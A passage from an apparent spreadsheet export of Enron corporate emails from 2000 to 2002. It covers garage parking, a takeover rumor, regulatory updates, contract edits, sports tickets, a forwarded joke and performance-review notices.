Enriquez/Enron@EnronXGate, Soo-Lian Eng Ervin/Enron@EnronXGate, Irene _x000D_
Flynn/HOU/ECT@ECT, Christopher Funk/Enron@EnronXGate, Jim _x000D_
Fussell/Enron@EnronXGate, Clarissa Garcia/HOU/ECT@ECT, Lisa _x000D_
Gillette/HOU/ECT@ECT, Carolyn Gilley/HOU/ECT@ECT, Gerri Gosnell/HOU/ECT@ECT, _x000D_
Jeffrey C Gossett/HOU/ECT@ECT, Michael Guadarrama/Enron@EnronXGate, Victor _x000D_
Guggenheim/HOU/ECT@ECT, Cynthia Hakemack/HOU/ECT@ECT, Kenneth M _x000D_
Harmon/Enron@EnronXGate, Susan Harrison/Enron@EnronXGate, Elizabeth L _x000D_
Hernandez/HOU/ECT@ECT, Meredith Homco/HOU/ECT@ECT, Alton Honore/HOU/ECT@ECT, _x000D_
Roberto Deleon/Enron@EnronXGate, Jay Desai/HR/Corp/Enron@ENRON, Hal _x000D_
Elrod/Enron@EnronXGate, Paul Finken/Enron@EnronXGate, Brenda _x000D_
Flores-Cuellar/Enron@EnronXGate, Irma Fuentes/Enron@EnronXGate, Jim _x000D_
Gearhart/Enron@EnronXGate, Camille Gerard/Corp/Enron@ENRON, Sharon _x000D_
Gonzales/NA/Enron@ENRON, Carolyn Graham/Enron@EnronXGate, Thomas D _x000D_
Gros/Enron@EnronXGate, Sam Guerrero/Enron@EnronXGate, Andrew _x000D_
Hawthorn/Enron@EnronXGate, Katherine Herrera/Corp/Enron@ENRON, Christopher _x000D_
Ducker/Enron@EnronXGate, Jarod Jenson/Enron@EnronXGate, Wenyao _x000D_
Jia/Enron@EnronXGate, Kam Keiser/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, _x000D_
William Kelly/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT, Lisa Kinsey/HOU/ECT@ECT, _x000D_
Victor Lamadrid/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Jenny _x000D_
Latham/HOU/ECT@ECT, Jonathan Le/Enron@EnronXGate, Lisa Lees/HOU/ECT@ECT, Kori _x000D_
Loibl/HOU/ECT@ECT, Duong Luu/Enron@EnronXGate, Shari Mao/HOU/ECT@ECT, David _x000D_
Maxwell/Enron@EnronXGate, Mark McClure/HOU/ECT@ECT, Doug _x000D_
McDowell/Enron@EnronXGate, Gregory McIntyre/Enron@EnronXGate, Darren _x000D_
McNair/Enron@EnronXGate, Keith Meurer/Enron@EnronXGate, Jackie _x000D_
Morgan/HOU/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT, Gary Nelson/HOU/ECT@ECT, _x000D_
Michael Neves/Enron@EnronXGate, Joanie H Ngo/HOU/ECT@ECT, Thu T _x000D_
Nguyen/HOU/ECT@ECT, Angela Hylton/Enron@EnronXGate, Jeff _x000D_
Johnson/Enron@EnronXGate, Laura Johnson/Enron@EnronXGate, Robert W _x000D_
Jones/Enron@EnronXGate, Kara Knop/Enron@EnronXGate, John _x000D_
Letvin/Enron@EnronXGate, Kathy Link/Enron@EnronXGate, Teresa _x000D_
McOmber/NA/Enron@ENRON, James Moore/Enron@EnronXGate, Jennifer _x000D_
Nguyen/Corp/Enron@ENRON, ThuHa Nguyen/Enron@EnronXGate, George _x000D_
Nguyen/Enron@EnronXGate, Reina Mendez/Enron@EnronXGate, Frank Karbarz/Enron _x000D_
Communications@Enron Communications, William May/Enron Communications@Enron _x000D_
Communications, John Norden/Enron@EnronXGate, Kimberly S Olinger/HOU/ECT@ECT, _x000D_
Richard Pinion/HOU/ECT@ECT, Bryan Powell/Enron@EnronXGate, Phillip C. _x000D_
Randle/Enron@EnronXGate, Leslie Reeves/HOU/ECT@ECT, Stacey _x000D_
Richardson/HOU/ECT@ECT, Drew Ries/Enron@EnronXGate, Jose Ruiz/MAD/ECT@ECT, _x000D_
Tammie Schoppe/HOU/ECT@ECT, Mark L Schrab/HOU/ECT@ECT, Sherlyn _x000D_
Schumack/HOU/ECT@ECT, Susan M Scott/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, _x000D_
Russ Severson/HOU/ECT@ECT, John Shupak/Enron@EnronXGate, Bruce _x000D_
Smith/Enron@EnronXGate, George F Smith/HOU/ECT@ECT, Will F _x000D_
Smith/Enron@EnronXGate, Mary Solmonson/Enron@EnronXGate, Sai _x000D_
Sreerama/HOU/ECT@ECT, Mechelle Stevens/HOU/ECT@ECT, Patti _x000D_
Sullivan/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, Michael _x000D_
Swaim/Enron@EnronXGate, Janette Oquendo/Enron@EnronXGate, Ryan _x000D_
Orsak/ENRON@enronXgate, Mark Palmer/Corp/Enron@ENRON, Michael K _x000D_
Patrick/Enron@EnronXGate, John Pavetto/Enron@EnronXGate, Catherine _x000D_
Pernot/Enron@EnronXGate, John D Reese/Enron@EnronXGate, Sandy _x000D_
Rivas/Enron@EnronXGate, Sean Sargent/Enron@EnronXGate, Vanessa _x000D_
Schulte/Enron@EnronXGate, Rex Shelby/Enron@EnronXGate, Jeffrey _x000D_
Snyder/Enron@EnronXGate, Joe Steele/Enron@EnronXGate, Omar _x000D_
Taha/Enron@EnronXGate, Diana Peters/Enron@EnronXGate@ENRON_DEVELOPMENt, Harry _x000D_
Swinton/Enron@EnronXGate, James Post/Enron Communications@Enron _x000D_
Communications, Mable Tang/Enron@EnronXGate, Sheri Thomas/HOU/ECT@ECT, _x000D_
Alfonso Trabulsi/HOU/ECT@ECT, Susan D Trevino/HOU/ECT@ECT, Connie _x000D_
Truong/Enron@EnronXGate, Khadiza Uddin/Enron@EnronXGate, Adarsh _x000D_
Vakharia/HOU/ECT@ECT, Rennu Varghese/Enron@EnronXGate, Kimberly _x000D_
Vaughn/HOU/ECT@ECT, Judy Walters/HOU/ECT@ECT, Mary _x000D_
Weatherstone/Enron@EnronXGate, Stacey W White/HOU/ECT@ECT, Jason _x000D_
Williams/HOU/ECT@ECT, Scott Williamson/Enron@EnronXGate, O'Neal D _x000D_
Winfree/HOU/ECT@ECT, Jeremy Wong/Enron@EnronXGate, Rita Wynne/HOU/ECT@ECT, _x000D_
Steve Tenney/Enron@EnronXGate, Todd Thelen/Enron@EnronXGate, N Jessie _x000D_
Wang/Enron@EnronXGate, Gwendolyn Williams/ENRON@enronXgate, Dejoun _x000D_
Windless/Corp/Enron@ENRON, Jeanne Wukasch/Corp/Enron@ENRON, Lisa _x000D_
Yarbrough/Enron@EnronXGate, Will Zamer/Enron@EnronXGate, Ned _x000D_
Higgins/HOU/ECT@ECT, Saji John/Enron Communications@Enron Communications, _x000D_
Francisco Pinto Leite/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barry _x000D_
Tycholiz/NA/Enron@ENRON, Bob M Hall/NA/Enron@Enron, Pamela _x000D_
Brown/NA/Enron@Enron, Gerri Gosnell/HOU/ECT@ECT_x000D_
cc: Louis Allen/EPSC/HOU/ECT@ECT, Raquel Lopez/Corp/Enron@ENRON _x000D_
Subject: Enron Center Garage_x000D_
_x000D_
The Enron Center garage will be opening very soon._x000D_
_x000D_
Employees who work for business units that are scheduled to move to the new _x000D_
building and currently park in the Allen Center or Met garages are being _x000D_
offered a parking space in the new Enron Center garage._x000D_
_x000D_
This is the only offer you will receive during the initial migration to the _x000D_
new garage. Spaces will be filled on a first come first served basis. The _x000D_
cost for the new garage will be the same as Allen Center garage which is _x000D_
currently $165.00 per month, less the company subsidy, leaving a monthly _x000D_
employee cost of $94.00._x000D_
_x000D_
If you choose not to accept this offer at this time, you may add your name to _x000D_
the Enron Center garage waiting list at a later day and offers will be made _x000D_
as spaces become available. _x000D_
_x000D_
The Saturn Ring  that connects the garage and both buildings will not be _x000D_
opened until summer 2001. All initial parkers will have to use the street _x000D_
level entrance to Enron Center North until Saturn Ring access is available. _x000D_
Garage stairways next to the elevator lobbies at each floor may be used as an _x000D_
exit in the event of elevator trouble. _x000D_
_x000D_
If you are interested in accepting this offer, please reply via email to _x000D_
Parking and Transportation as soon as you reach a decision. Following your _x000D_
email, arrangements will be made for you to turn in your old parking card and _x000D_
receive a parking transponder along with a new information packet for the new _x000D_
garage._x000D_
_x000D_
The Parking and Transportation desk may be reached via email at Parking and _x000D_
Transportation/Corp/Enron or 713-853-7060  with any questions. _x000D_
_x000D_
(You must enter &amp; exit on Clay St. the first two weeks, also pedestrians, _x000D_
will have to use the garage stairwell located on the corner of Bell &amp; Smith.)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 15:00:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Hope you can make our party on the 27th Oct</t>
  </si>
  <si>
    <t>Great_x000D_
_x000D_
You too._x000D_
_x000D_
Doug_x000D_
Doug-Gilbert Smith</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 07:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'karen.denne@enron.com'})</t>
  </si>
  <si>
    <t>Carin Energy Rumor</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Steven J Kean/NA/Enron on 08/31/2000 _x000D_
02:24 PM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey Sherrick_x000D_
08/31/2000 01:23 PM_x000D_
To: John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steven J _x000D_
Kean/NA/Enron@Enron, Jackie Gentle/LON/ECT@ECT, Mark Koenig/Corp/Enron@ENRON_x000D_
cc: Stephen Wallace/Corp/Enron@ENRON, Horace Snyder/Corp/Enron@ENRON, Stephen _x000D_
Harper/Corp/Enron@ENRON, Alex Warmath/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Carin Energy Rumor_x000D_
_x000D_
FYI,   There is a rumor on Yahoo that Enron has bid for Carin Energy.  I have _x000D_
talked with Jackie Gentle in our London Office who first heard the rumor and _x000D_
we have confirmed that neither EGEP or the London office is pursuing such a _x000D_
deal.  My guess is that it is either EOGR ( I know they are pursuing an Int'l _x000D_
deal) or just a bad release._x000D_
_x000D_
jeff_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 07:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'becky.spencer@enron.com', 'bettye.langham@excite.com', 'pat.radford@enron.com', 'kaye.ellis@enron.com', 'jenny.helton@enron.com'})</t>
  </si>
  <si>
    <t>FW: Letter from Grandma--funny =)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
&gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;I got a letter from Grandma the other day and she writes:_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;The other day I went up to a local Christian bookstore and saw_x000D_
&gt;&gt;a_x000D_
&gt;&gt; &gt; &gt; honk_x000D_
&gt;&gt; &gt; &gt; &gt;if_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;you love Jesus bumper sticker.  I was feeling particularly_x000D_
&gt;&gt;sassy_x000D_
&gt;&gt; &gt; &gt; that_x000D_
&gt;&gt; &gt; &gt; &gt;day_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;because I had just come from a thrilling choir performance,_x000D_
&gt;&gt; &gt; followed_x000D_
&gt;&gt; &gt; &gt; &gt;by_x000D_
&gt;&gt; &gt; &gt; &gt;a_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;thunderous prayer meeting, so I bought the sticker and put in_x000D_
&gt;&gt;on_x000D_
&gt;&gt; &gt; my_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;bumper._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;I was stopped at a red light at a busy intersection, just lost_x000D_
&gt;&gt;in_x000D_
&gt;&gt; &gt; &gt; &gt;thought_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;about the Lord and how good He is and I didn't notice that the_x000D_
&gt;&gt; &gt; light_x000D_
&gt;&gt; &gt; &gt; &gt;had_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;changed.  It is a good thing someone else loves Jesus because_x000D_
&gt;&gt;if_x000D_
&gt;&gt; &gt; he_x000D_
&gt;&gt; &gt; &gt; &gt;hadn't_x000D_
&gt;&gt; &gt; &gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;honked, I'd never have noticed.  I found that LOTS of people_x000D_
&gt;&gt;love_x000D_
&gt;&gt; &gt; &gt; &gt;Jesus._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;Why, while I was sitting there, the guy behind started honking_x000D_
&gt;&gt; &gt; like_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;crazy, and when he leaned out of his window and screamed, "for_x000D_
&gt;&gt;the_x000D_
&gt;&gt; &gt; &gt; &gt;love_x000D_
&gt;&gt; &gt; &gt; &gt;of_x000D_
&gt;&gt; &gt; &gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;God, GO! GO!"  What an exuberant cheerleader he was for Jesus._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;Everyone started honking!  I just leaned out of my window and_x000D_
&gt;&gt; &gt; &gt; started_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;waving and smiling at all these loving people.  I even honked_x000D_
&gt;&gt;my_x000D_
&gt;&gt; &gt; &gt; horn_x000D_
&gt;&gt; &gt; &gt; &gt;a_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;few times to share in the love.  There must have been a man_x000D_
&gt;&gt;from_x000D_
&gt;&gt; &gt; &gt; &gt;Florida_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;back there because I heard him yelling something about a sunny_x000D_
&gt;&gt; &gt; &gt; &gt;beach..._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;I saw another guy waving in a funny way with only his middle_x000D_
&gt;&gt; &gt; finger_x000D_
&gt;&gt; &gt; &gt; &gt;stuck_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;up in the air.  When I asked my teenage grandson in the back_x000D_
&gt;&gt;seat_x000D_
&gt;&gt; &gt; &gt; &gt;what_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;that meant, he said that it was probably a Hawaiian good luck_x000D_
&gt;&gt;sign_x000D_
&gt;&gt; &gt; &gt; or_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;something. Well, I've never met anyone from Hawaii, so I leaned_x000D_
&gt;&gt; &gt; out_x000D_
&gt;&gt; &gt; &gt; &gt;the_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;window and gave him the good luck sign back.  My grandson burst_x000D_
&gt;&gt; &gt; out_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;laughing, why even he was enjoying this religious experience._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;A couple of the people were so caught up in the joy of the_x000D_
&gt;&gt;moment_x000D_
&gt;&gt; &gt; &gt; &gt;that_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;they got out of their cars and started walking towards me._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;I bet they wanted to pray or ask what church I attended, but_x000D_
&gt;&gt;this_x000D_
&gt;&gt; &gt; is_x000D_
&gt;&gt; &gt; &gt; &gt;when_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;I noticed the light had changed.  So, I waved to all my sisters_x000D_
&gt;&gt; &gt; and_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;brothers grinning, and drove on through the intersection.  I_x000D_
&gt;&gt; &gt; noticed_x000D_
&gt;&gt; &gt; &gt; &gt;I_x000D_
&gt;&gt; &gt; &gt; &gt;was_x000D_
&gt;&gt; &gt; &gt; &gt; &gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;the only car that got through the intersection before the light_x000D_
&gt;&gt; &gt; &gt; &gt;changed_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;again and I felt kind of sad that I had to leave them after all_x000D_
&gt;&gt; &gt; the_x000D_
&gt;&gt; &gt; &gt; &gt;love_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;we had shared.  So I slowed the car down, leaned out of the_x000D_
&gt;&gt;window_x000D_
&gt;&gt; &gt; &gt; &gt;and_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;gave them all the Hawaiian good luck sign one last time as I_x000D_
&gt;&gt;drove_x000D_
&gt;&gt; &gt; &gt; &gt;away._x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;    Praise the Lord for such wonderful folks!_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;    Grandma_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;&gt;_x000D_
&gt;&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
this is pretty funny_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com._x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 02:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Sorry it has taken me a few days to get back with you, I had to leave town _x000D_
unexpectedly and just returned today.  All of that sounds great, how about _x000D_
putting the file in the O drive under erms/1intra/central.  Please name the _x000D_
file EOL curves.  Please let me know if you have any problems.  Thanks for _x000D_
your help on this matter._x000D_
PL</t>
  </si>
  <si>
    <t>Fri, 8 Mar 2002 12:31:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephen.veatch@enron.com', 'rob.wilson@enron.com', 'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Report of 3/8/02</t>
  </si>
  <si>
    <t xml:space="preserve">California:_x000D_
_x000D_
CPUC - Gov. Gray Davis has appointed Michael Peevey, former President of Southern California Edison as Commissioner at the CPUC to replace Com. Bilas who resigned last week.  Gov. Davis' appointment of Mr. Peevey was met with protests from consumer groups who see him as someone advocating deregulation and having a record of pushing for higher rates for small businesses and residential consumers.  Mr. Peevey's appointment is subject to Senate approval._x000D_
_x000D_
I99-07-003  SoCal Unbundling.  Reviewed the Comprehensive Settlement Agreement, Lorenz testimony in the System Adequacy proceeding and the Dec. 11th Unbundling Decision as to the treatment of receipt point capacity especially as related to the 50MM/d increase at Needles.  As discussed, the Lorenz testimony provides the best basis for allocating the 50MM/d to TW until the CSA provisions are implemented on Nov. 1, 2002.  _x000D_
_x000D_
A01-10-011  PG&amp;E Gas Accord II.  The ALJ in this case, John Wong, issued a ruling on which issues will be addressed and an initial schedule for the proceeding.  Issues to be addressed include:  Determining restriction requirements on bidders of relinquished and expansion capacity; How to handle relinquished  storage capacity (i.e. open season); How contracts will be handled to match up with PG&amp;E's proposed GTrans' capacity in its POR; and open season procedures for relinquished and expansion capacity.  Direct testimony is due July 15, 2002 and Evidentary Hearings are set to begin August 5, 2002._x000D_
_x000D_
A01-09-024  SoCalGas BCAP.  On Monday, SoCal filed an amended BCAP filing to reflect the impact of unbundling the system.  Copies have been requested but not yet received for review._x000D_
_x000D_
Election Results -  In an upset, LA businessman Bill Simon won the Republican nomination by winning 49% of the vote compared to 30% of the voters favoring former LA Mayor Richard Riordan and 17% of the vote which went to Secretary of State, Bill Jones.  Simon will run against Gov. Davis in the fall elections for Governor.  Congressman Gary Condit was beaten by his former aide, Assemblyman Dennis Cardoza._x000D_
_x000D_
New Mexico:_x000D_
_x000D_
Legislative - As promised, Republican Gov. Gary Johnson vetoed this week the Legislatures latest budget proposal and vowed to keep the state running by using the previous year budget.  Democratic leaders of the Senate and House have proposed appointing a bipartisan group of lawmakers to explore whether a budget compromise can be reached with Gov. Johnson.  Johnson's Chief of Staff, David McCumber didn't reject the idea for the governor, but did raise some concerns about the approach._x000D_
_x000D_
Utility Case No. 3619 - The New Mexico PRC has issued proposed revisions to Rule 572 for Renewable Energy.  The Proposed revisions require all providers of electricity to increase their renewable energy portfolio such that they meet certain standards of renewable sources.   By Sept. 1, 2003 the portfolio standard will be 2%, by Sept. 1, 2005 it must be 5% and by Sept. 1 2007 renewable sources must be 10% of their energy portfolio.  Renewable sources are defined to include solar, wind, hydropower, geothermal and biomass._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.richman@enron.com'})</t>
  </si>
  <si>
    <t>Re: enovate exchange agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
 I made the same change to both Oneok and PG&amp;E regarding payment following _x000D_
the service month.  Is this correct.  Please check each document and if okay, _x000D_
please forward to the counterparty for their execution and return._x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 02:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.tagliarino@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sally.keepers@enron.com'})</t>
  </si>
  <si>
    <t>Allen Gage / Rockets Tickets</t>
  </si>
  <si>
    <t>Sally,_x000D_
_x000D_
Per your request, I have responded to Allen Gage with Mr. Lay's ticket _x000D_
selection for the upcoming 2000 - 2001 Rockets season.  He has asked if Mr. _x000D_
Lay would reconsider providing 1 of the 2 Los Angeles Lakers games (Nov. 7 or _x000D_
Dec. 21) in exchange for one of his January game choices?  As stated in the _x000D_
agreement letter, if Mr. Lay elects - we could provide Allen Gage with Mr. _x000D_
Lay's tickets behind the Rockets bench at Courtside Row 2, Seats 25-28 as _x000D_
another option.  _x000D_
_x000D_
Please let me know how Mr. Lay would like to proceed with this request.  If _x000D_
you would like to discuss this directly, please call me at 3-7883._x000D_
_x000D_
Thank you._x000D_
DT</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 08:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Both are in VEPCO, names under the Word icon on the email.  I'll try to _x000D_
remember next time._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/15/2000 03:08 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: VEPCO comparison  _x000D_
_x000D_
It's easier if you just tell me the names because I have to know _x000D_
directories.  I assume these are in your VEPCO files.  I'm going to try and _x000D_
see if Comparerite works. If not, I'll do it the old fashion way, the Word _x000D_
way._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/15/2000 03:05 PM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: VEPCO comparison_x000D_
_x000D_
Please compare this new document:_x000D_
_x000D_
_x000D_
_x000D_
to this old draft, and create a redline:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>agreement</t>
  </si>
  <si>
    <t>Pete,_x000D_
_x000D_
I'm getting comments that people are having trouble opening the ABB docs.  _x000D_
Please send the docs directly to:  david.onunscheck@us.abb.com and michael.o. _x000D_
sandridge@us.abb.com, and fred.mitro@enron.com._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Union Carbide - safety net gas</t>
  </si>
  <si>
    <t>Union Carbide stopped taking 3,000/d of the safety net gas at 4 am on _x000D_
December 14 .... so at this time they are only taking 9,000/d at Texas City</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 03:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jan.cooley@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.williams@enron.com', 'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mday@gmssr.com', 'susan.mara@enron.com', 'wanda.curry@enron.com'})</t>
  </si>
  <si>
    <t>FCE Negative CTC</t>
  </si>
  <si>
    <t>This will confirm the conference call scheduled for today (April 24) from _x000D_
1:30 to 2:00 p.m. CDT to discuss the FCE Negative CTC.  The call-in numbers _x000D_
are below:_x000D_
_x000D_
Domestic: 800-991-9019_x000D_
International: 847-619-8039_x000D_
Pass Code: 6686278_x000D_
_x000D_
Please call me at (713) 345-6355 if you have any problems placing this call.  _x000D_
Thank you.</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 06:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>i went to kenneally's.  it was a blast.  what did you do?  what have you been _x000D_
up to?  i haven't seen you in a while.</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 06:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: HELP -- CEO email</t>
  </si>
  <si>
    <t xml:space="preserve">here's my "version":_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Jeff Dasovich on 05/22/2001 10:53 AM CDT_x000D_
Sent by: Jeff Dasovich_x000D_
To: Karen Denne/Corp/Enron@ENRON_x000D_
cc: Joseph Alamo/NA/Enron@Enron _x000D_
_x000D_
Subject: HELP -- CEO email_x000D_
_x000D_
I'll have Joseph clean up the letter and send you the email/fax #'s etc. for _x000D_
the list, for the cards that I gathered._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 05/22/2001 10:51 AM -----_x000D_
_x000D_
	Karen Denne_x000D_
	05/22/2001 12:45 AM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: HELP -- CEO email_x000D_
_x000D_
Jeff -- Thanks for your phone message.  I'm stuck and need your help.  My _x000D_
Microsoft Word isn't working, and I want to send something out to the ceos _x000D_
asap tuesday.  Can you clean up the letter?  I'm fine w/ your edits (for the _x000D_
signature line, add "name, title")  Pls send me the final letter so I can _x000D_
detach.  i've left a message for steve and will wait to send until i hear _x000D_
from him.   _x000D_
_x000D_
I'm didn't collect biz cards from everyone at the CEO meetings, and I need _x000D_
email and/or fax numbers for:_x000D_
_x000D_
Tony Ridder_x000D_
Steve Kirsch_x000D_
Ken Oshman_x000D_
Fred Anderson_x000D_
Dan Scheinman_x000D_
Vivek Ranadive_x000D_
John Doerr_x000D_
Ray Irani_x000D_
_x000D_
Can you send me the info from their cards?  Call me if you have any _x000D_
questions.  THANK YOU!!!_x000D_
_x000D_
kd_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Calpine Power Services/Calpine Energy Services</t>
  </si>
  <si>
    <t xml:space="preserve">I think we were under the impression that this was a name change._x000D_
_x000D_
_x000D_
From: Tana Jones on 11/14/2000 03:12 PM_x000D_
To: Tanya Rohauer/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Calpine Power Services/Calpine Energy Services_x000D_
_x000D_
This Counterparty is on the 11/9/00 EOL List.  We have received documentation _x000D_
that reflects that Calpine Power Services Company, an entity where we have an _x000D_
ISDA Master in place, has merged with and into Calpine Energy Services, L.P., _x000D_
an entity where we don't have an ISDA in place with.   Is Credit OK with this _x000D_
merger?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 07:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NOTE:  YOU WILL RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER._x000D_
_x000D_
You have been selected to participate in the Year End 2000 Performance _x000D_
Management process by providing meaningful feedback on specific employee(s).  _x000D_
Your feedback plays an important role in the process, and your participation _x000D_
is critical to the success of Enron's Performance Management goals._x000D_
_x000D_
To complete requests for feedback, access PEP at http://pep.corp.enron.com _x000D_
and select Perform Review under Performance Review Services.  You may begin _x000D_
providing feedback immediately and are requested to have all feedback forms _x000D_
completed by Friday, November 17, 2000._x000D_
_x000D_
If you have any questions regarding PEP or your responsibility in the _x000D_
process, please contact the PEP Help Desk at:_x000D_
_x000D_
Houston: 1.713.853.4777, Option 4_x000D_
London:  44.207.783.4040, Option 4_x000D_
Email: perfmgmt@enron.com_x000D_
_x000D_
Thank you for your participation in this important process._x000D_
_x000D_
The following is a CUMULATIVE list of employee feedback requests with a _x000D_
status of "OPEN."   Once you have submitted or declined an employee?s request _x000D_
for feedback, their name will no longer appear on this list._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Review Group: ENRON_x000D_
Feedback Due Date: Nov 17, 2000_x000D_
_x000D_
Employee Name                   Supervisor Name                 Date Selected_x000D_
-------------                   ---------------                 -------------_x000D_
